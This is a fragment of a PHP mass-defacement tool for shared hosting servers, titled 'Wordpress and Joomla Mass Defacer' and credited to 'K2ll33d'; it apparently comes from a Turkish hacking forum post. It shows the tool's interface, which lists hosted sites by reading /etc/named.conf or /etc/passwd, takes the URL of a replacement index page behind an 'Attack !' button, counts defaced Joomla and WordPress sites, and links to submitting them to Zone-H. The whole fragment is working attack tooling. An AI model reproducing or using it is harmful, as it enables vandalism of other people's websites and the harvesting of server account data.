echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if($count1+$count2 > 0){
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
echo '<!DOCTYPE html>
<html>
<head>
<title>Joomla ~ Wordpress Mass Defacer</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<style type="text/css">
table,body {
background:
url("https://d33ds.co/img/bg3.png") repeat ,
url("https://d33ds.co/img/bglight.png") no-repeat center top,top left,top right,
url("https://d33ds.co/img/bg2.png") repeat top left;
background-color: #ffffff;
color:white;
font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
.header {position:fixed;width:100%;top:0;background:#000;}
.footer {position:fixed;width:100%;bottom:0;background:#000;}
input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
input[type="submit"]:hover{color:SeaShell;}
input[type="text"]:hover{color:SeaShell;}
input[type="radio"]{margin-top: 0;}
.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
.even {background-color: rgba(25, 25, 25, 0.6);}
.odd {background-color: rgba(102, 102, 102, 0.6);}
a {color:#fff;} a:hover {color:#00BFFF;}
fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
textarea{background: rgba(0,0,0,0.6); color: white;}
.green {color:#00FF00;font-weight:bold;}
.red {color:#FF0000;font-weight:bold;}
.killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
</style>
<script type="text/javascript">
function change() {
if(document.getElementById(\'rcd\').checked == true) {
document.getElementById(\'tra\').style.display = \'\';
} else {
document.getElementById(\'tra\').style.display = \'none\';
}
        }
        function hide() {
document.getElementById(\'tra\').style.display = \'none\';
        }
    </script>
</head>
<body>
<div class="footer">
<h3 style="text-align: center;">&copy; K2ll33d&nbsp;&nbsp;<a href="http://facebook.com/k2ll33d" target="_blank"><img src="https://fbstatic-a.akamaihd.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico" width=30></a></h3>
</div>
<h2 style="color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';
if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
echo '<div align="center">
<form action="" method="post">
<table>
<tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr>
<tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
</table>
<br />
<input type="hidden" name="form_action" value="1">
<table>
<tr><td><b>index url: </b><input size="35" type="text" name="defpage" value=""></tr></td>
</table>
<input class=submit type="submit" value="Attack !" name="Submit">
</form>';
    }
$milaf_el_index = $_POST['defpage'];
    if($_POST['form_action'] == 1) {
if($_POST['mode']==1) { exec_mode_1($milaf_el_index, $hacker); }
if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }
if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }
    }
    if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }
    echo '</body>
</html>';
www.deccal.org


eline sağlık.


